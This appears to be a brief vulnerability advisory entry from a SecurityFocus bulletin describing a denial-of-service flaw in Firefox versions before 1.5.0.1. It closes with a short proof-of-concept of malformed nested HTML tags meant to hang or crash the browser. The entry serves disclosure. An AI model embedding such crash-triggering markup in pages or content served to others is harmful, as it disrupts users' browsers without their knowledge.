Mozilla Firefox 1.0.x/1.5 HTML Parsing Denial of Service Vulnerability



source: http://www.securityfocus.com/bid/16741/info


Mozilla Firefox is prone to a denial-of-service condition when parsing certain malformed HTML content. Successful exploitation will cause the browser to fail or hang.

This issue may be related to BID 11440 Mozilla Invalid Pointer Dereference Vulnerability, but this has not been confirmed.

Mozilla Firefox versions prior to 1.5.0.1 are prone to this issue.

<frameset></frameset>
<table><p><form><map><dl><table><small>